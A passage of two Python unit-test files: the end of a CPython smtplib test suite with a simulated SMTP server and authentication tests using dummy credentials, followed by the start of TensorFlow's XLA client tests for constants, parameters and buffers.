self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises socket.error
self.assertRaises(socket.error, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(socket.error, smtplib.SMTP,
"localhost:bogus")
# test response of client to a non-successful HELO message
@unittest.skipUnless(threading, 'Threading required for this test.')
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
self.old_stdout = sys.stdout
self.output = StringIO.StringIO()
sys.stdout = self.output
self._threads = test_support.threading_setup()
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = test_support.bind_port(self.sock)
servargs = (self.evt, "199 no hello for you!\n", self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
self.thread.join()
test_support.threading_cleanup(*self._threads)
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
@unittest.skipUnless(threading, 'Threading required for this test.')
class TooLongLineTests(unittest.TestCase):
respdata = '250 OK' + ('.' * smtplib._MAXLINE * 2) + '\n'
def setUp(self):
self.old_stdout = sys.stdout
self.output = StringIO.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = test_support.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
threading.Thread(target=server, args=servargs).start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@somewhere.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_auth_credentials = {
'login': 'TXIuQUBzb21ld2hlcmUuY29t',
'plain': 'AE1yLkFAc29tZXdoZXJlLmNvbQBzb21lcGFzc3dvcmQ=',
'cram-md5': ('TXIUQUBZB21LD2HLCMUUY29TIDG4OWQ0MJ'
'KWZGQ4ODNMNDA4NTGXMDRLZWMYZJDMODG1'),
}
sim_auth_login_password = 'C29TZXBHC3N3B3JK'
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@somewhere.com',],
}
# Simulated SMTP channel & server
class SimSMTPChannel(smtpd.SMTPChannel):
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
smtpd.SMTPChannel.__init__(self, *args, **kw)
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_AUTH(self, arg):
if arg.strip().lower()=='cram-md5':
self.push('334 {0}'.format(sim_cram_md5_challenge))
return
mech, auth = arg.split()
mech = mech.lower()
if mech not in sim_auth_credentials:
self.push('504 auth type unimplemented')
return
if mech == 'plain' and auth==sim_auth_credentials['plain']:
self.push('235 plain auth ok')
elif mech=='login' and auth==sim_auth_credentials['login']:
self.push('334 Password:')
else:
self.push('550 No access for you!')
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
def __init__(self, *args, **kw):
self._extra_features = []
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accept(self):
conn, addr = self.accept()
self._SMTPchannel = SimSMTPChannel(self._extra_features,
self, conn, addr)
def process_message(self, peer, mailfrom, rcpttos, data):
pass
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self._threads = test_support.threading_setup()
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1))
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
test_support.threading_cleanup(*self._threads)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for email, name in sim_users.items():
expected_known = (250, '%s %s' % (name, smtplib.quoteaddr(email)))
self.assertEqual(smtp.vrfy(email), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, 'No such user: %s' % u)
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, '\n'.join(users))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, 'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
expected_auth_ok = (235, b'plain auth ok')
self.assertEqual(smtp.login(sim_auth[0], sim_auth[1]), expected_auth_ok)
# SimSMTPChannel doesn't fully support LOGIN or CRAM-MD5 auth because they
# require a synchronous read to obtain the credentials...so instead smtpd
# sees the credential sent by smtplib's login method as an unknown command,
# which results in smtplib raising an auth error. Fortunately the error
# message contains the encoded credential, so we can partially check that it
# was generated correctly (partially, because the 'word' is uppercased in
# the error message).
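# For reference, a sketch of the encoding being checked (not executed here):
# the AUTH PLAIN credential is base64 over NUL-separated fields, e.g.
#     base64.b64encode('\0Mr.A@somewhere.com\0somepassword')
# yields sim_auth_credentials['plain']; AUTH LOGIN instead sends the user name
# and password base64-encoded in separate steps, which is why only the encoded
# password is looked for in the error message below.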
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
if sim_auth_login_password not in str(err):
raise "expected encoded password not found in error message"
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
if sim_auth_credentials['cram-md5'] not in str(err):
raise "expected encoded credentials not found in error message"
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=15)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_main(verbose=None):
test_support.run_unittest(GeneralTests, DebuggingServerTests,
NonConnectingTests,
BadHELOServerTests, SMTPSimTests,
TooLongLineTests)
if __name__ == '__main__':
test_main()
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Backend-dependent tests for the Python XLA client."""
import functools
import itertools
import re
import threading
import unittest
from absl import flags
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.xla.python import xla_client
# pylint: disable=g-import-not-at-top
try:
from tensorflow.compiler.xla.python import custom_call_for_test
except ImportError:
custom_call_for_test = None
bfloat16 = xla_client.bfloat16
ops = xla_client.ops
FLAGS = flags.FLAGS
# We choose to ignore pylint's complaints about complex comprehensions, which we
# use widely for parameterizing tests.
# pylint: disable=g-complex-comprehension
def TestFactory(xla_backend, cloud_tpu=False):
tests = []
if not cloud_tpu:
int_dtypes = [np.int32, np.int64, np.uint32, np.uint64]
# TODO(phawkins): test np.float16, where supported.
float_dtypes = [bfloat16, np.float32, np.float64]
complex_dtypes = [np.complex64, np.complex128]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
else:
int_dtypes = [np.int32, np.uint32]
float_dtypes = [np.float32]
complex_dtypes = [np.complex64]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
dlpack_dtypes = int_dtypes + float_dtypes
class ComputationTest(parameterized.TestCase):
"""Base class for running an XLA Computation through the local client."""
def setUp(self):
super(ComputationTest, self).setUp()
self.backend = xla_backend()
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.XlaBuilder(name)
def _Execute(self, c, arguments):
compiled_c = self.backend.compile(c.build())
return xla_client.execute_with_python_values(
compiled_c, arguments, backend=self.backend)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
results = self._Execute(c, arguments)
self.assertLen(results, len(expected))
for result, e in zip(results, expected):
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be stricter, so we assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(e).shape)
assert_func(result, e)
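# (Illustration of the leniency mentioned above, not executed:
#  np.testing.assert_equal(4, np.array([[4]])) passes because the scalar is
#  broadcast, so the explicit shape check above is what catches rank changes.)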
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments,
expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-4,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationPrinting(absltest.TestCase):
def setUp(self):
super(ComputationPrinting, self).setUp()
self.backend = xla_backend()
def ExampleComputation(self):
builder = xla_client.XlaBuilder("acomputation")
p0 = ops.Parameter(builder, 0, xla_client.shape_from_pyval(np.float32(0)))
p1 = ops.Parameter(
builder, 1, xla_client.shape_from_pyval(np.zeros((4,), np.float32)))
x = ops.Mul(p0, p1)
ops.Add(x, x)
return builder.build()
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleToHloText(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
self.assertIn("fusion", hlo_text)
@unittest.skipIf(cloud_tpu, "not implemented")
def testFlopEstimate(self):
computation = self.ExampleComputation()
properties = xla_client._xla.hlo_module_cost_analysis(
self.backend, computation.as_hlo_module())
self.assertEqual(properties["flops"], 8.0)
tests.append(ComputationPrinting)
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testConstantScalarSum(self, dtype):
if dtype == np.int8 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support int8")
c = self._NewComputation()
ops.Add(ops.Constant(c, dtype(1.11)), ops.Constant(c, dtype(3.14)))
self._ExecuteAndCompareClose(c, expected=[dtype(1.11) + dtype(3.14)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorMul(self, dtype):
c = self._NewComputation()
ops.Mul(
ops.Constant(c, np.array([2.5, 3.3, -1.2, 0.7], dtype)),
ops.Constant(c, np.array([-1.2, 2, -2, -3], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[-3, 6.6, 2.4, -2.1]], rtol=3e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarDiv(self, dtype):
c = self._NewComputation()
ops.Div(
ops.Constant(c, np.array([1.5, 2.5, 3.0, -10.8], dtype=dtype)),
ops.Constant(c, dtype(2.0)))
self._ExecuteAndCompareClose(
c, expected=[[0.75, 1.25, 1.5, -5.4]], rtol=2e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarPow(self, dtype):
c = self._NewComputation()
ops.Pow(
ops.Constant(c, np.array([1.5, 2.5, 3.0], dtype=dtype)),
ops.Constant(c, dtype(2.)))
self._ExecuteAndCompareClose(c, expected=[[2.25, 6.25, 9.]])
def testIota(self):
c = self._NewComputation()
ops.Iota(c, xla_client.PrimitiveType.F32, 10)
self._ExecuteAndCompareExact(
c, expected=[np.arange(10, dtype=np.float32)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testBroadcastedIota(self, dtype):
c = self._NewComputation()
shape = xla_client.Shape.array_shape(
xla_client.dtype_to_etype(dtype), (2, 3))
ops.Iota(c, shape, 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=dtype)
self._ExecuteAndCompareExact(c, expected=[expected])
def testBooleanAnd(self):
c = self._NewComputation()
ops.And(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, False]])
def testBooleanOr(self):
c = self._NewComputation()
ops.Or(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, True, True, False]])
def testBooleanXor(self):
c = self._NewComputation()
ops.Xor(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2D(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)),
ops.Constant(c, np.array([[1, -1, 1], [-1, 1, -1]], dtype=dtype)))
self._ExecuteAndCompareClose(c, expected=[[[2, 1, 4], [3, 6, 5]]])
def testShiftLeft(self):
c = self._NewComputation()
ops.ShiftLeft(
ops.Constant(c, NumpyArrayS32([3])),
ops.Constant(c, NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[[12]])
def testShiftRightArithmetic(self):
c = self._NewComputation()
ops.ShiftRightArithmetic(
ops.Constant(c, NumpyArrayS32([-2])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[-1]])
def testShiftRightLogical(self):
c = self._NewComputation()
ops.ShiftRightLogical(
ops.Constant(c, NumpyArrayS32([-1])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[2**31 - 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim0(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 12, 13], [24, 25, 26], [37, 38, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim1(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 22, 33], [14, 25, 36], [17, 28, 39]]])
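# NumPy equivalents of the two broadcasts above (illustrative, not executed):
#   broadcast_dimensions=(0,)  ~  a + b[:, np.newaxis]   # b added down the rows
#   broadcast_dimensions=(1,)  ~  a + b[np.newaxis, :]   # b added across the columns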
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantAxpy(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Mul(
ops.Constant(c, dtype(2)),
ops.Constant(c, np.array([2.2, 3.3, 4.4, 5.5], dtype=dtype))),
ops.Constant(c, np.array([100, -100, 200, -200], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[104.4, -93.4, 208.8, -189]], rtol=2e-3)
def testCustomCall(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
ops.CustomCallWithLayout(
c,
b"test_subtract_f32",
operands=[
ops.Constant(c, np.float32(1.25)),
ops.Constant(c, np.float32(0.5))
],
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=[
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
])
self._ExecuteAndCompareClose(c, expected=[0.75])
tests.append(ComputationsWithConstantsTest)
class ComputationFromProtoTest(absltest.TestCase):
"""Test computation execution from HLO proto."""
def setUp(self):
super(ComputationFromProtoTest, self).setUp()
self.backend = xla_backend()
def testExecuteFromProto(self):
# Build the HLO proto
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
serialized_proto = b.build().as_serialized_hlo_module_proto()
# Load and execute the proto
c = xla_client.XlaComputation(serialized_proto)
ans, = xla_client.execute_with_python_values(
self.backend.compile(c), (), backend=self.backend)
np.testing.assert_equal(ans, np.int32(3))
tests.append(ComputationFromProtoTest)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testScalarTimesVector(self, dtype):
c = self._NewComputation()
arg0 = np.array(3, dtype=dtype)
arg1 = np.array([10, 15, -2, 7], dtype=dtype)
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.Mul(p0, p1)
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 * arg1])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testScalarMinusVectorExplicitNumbering(self, dtype):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
arg0 = np.array(2.0, dtype=dtype)
arg1 = np.array([-2.3, 3.3, -4.3, 5.3], dtype=dtype)
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
ops.Sub(p1, p0)
self._ExecuteAndCompareClose(
c, arguments=[arg0, arg1], expected=[arg1 - arg0])
tests.append(ParametersTest)
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def testConstantSum(self):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.float32(1.11)), ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(c, expected=[4.25])
def testOneParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=[4.25])
def testTwoParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0.))))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)],
expected=[4.25])
@unittest.skipIf(cloud_tpu, "not implemented")
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
arg = NumpyArrayF32(1.11)
compiled_c = self.backend.compile(c.build())
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(RuntimeError):
compiled_c.execute([arg_buffer])
def testXlaShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = self.backend.buffer_from_pyval(pyval)
xla_shape = local_buffer.xla_shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testBlockHostUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.block_host_until_ready()
# This test merely checks that nothing goes awry when we call
# block_host_until_ready(); it's difficult to test anything else.
def testBlockHostUntilReadyRaisesOnDeletedBuffer(self):
arg = np.array([[1., 2.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
buffer.delete()
with self.assertRaisesRegex(
RuntimeError,
re.escape(
"BlockHostUntilReady() called on deleted or donated buffer")):
buffer.block_host_until_ready()
def testDeviceArrayBaseSignatures(self):
# When extending `DeviceArrayBase`, the object behaves as a `DeviceArray`
# and thus needs to correctly implement the following methods.
arg = np.array([[1., 2., 3.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
if not isinstance(buffer, xla_client.DeviceArrayBase):
raise unittest.SkipTest(
"The objectof type {} do not extend DeviceArrayBase".format(
type(buffer)))
self.assertEqual(buffer.__array_priority__, 100)
self.assertEqual(buffer.shape, (1, 3))
self.assertEqual(buffer.dtype, np.float32)
self.assertEqual(buffer.size, 3)
self.assertEqual(buffer.ndim, 2)
self.assertIs(buffer, buffer.block_until_ready())
buffer.delete()
with self.assertRaises(RuntimeError):
buffer.block_until_ready()
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
def testDevice(self):
x = np.arange(8, dtype=np.int32)
for device in self.backend.local_devices():
buf = self.backend.buffer_from_pyval(x, device=device)
self.assertEqual(buf.device(), device)
np.testing.assert_equal(x, buf.to_py())
def testStandardTypes(self):
for dtype in standard_dtypes:
if dtype == bfloat16 or dtype == np.complex128:
continue
arr = self.backend.buffer_from_pyval(np.array([0, 1], dtype))
arr = arr.to_py()
self.assertEqual(dtype, type(arr[0]))
tests.append(BufferTest)
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As few additional ops as possible are added around the op
being tested.
"""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConcatenate(self, dtype):
c = self._NewComputation()
args = (
ops.Constant(c, np.array([1.0, 2.0, 3.0], dtype=dtype)),
ops.Constant(c, np.array([4.0, 5.0, 6.0], dtype=dtype)),
)
ops.ConcatInDim(c, args, dimension=0)
self._ExecuteAndCompareExact(
c, expected=[np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], dtype=dtype)])
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
} for src_dtype, dst_dtype in itertools.permutations(
[np.bool, np.int32, np.int64, np.float32, np.float64], 2))
# pyformat: enable
def testConvertElementType(self, src_dtype, dst_dtype):
if ((src_dtype in [np.int64, np.float64] or
dst_dtype in [np.int64, np.float64]) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.ConvertElementType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = np.array(x, dtype=dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# pyformat: disable
@parameterized.named_parameters(
{
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
}
for dtypes in [[np.int32, np.float32], [np.int64, np.float64]]
for src_dtype, dst_dtype in itertools.permutations(dtypes, 2))
# pyformat: enable
def testBitcastConvertType(self, src_dtype, dst_dtype):
if (np.float64 in (src_dtype, dst_dtype) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.BitcastConvertType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = x.view(dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
ops.AllToAll(ops.Constant(c, lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=[lhs])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
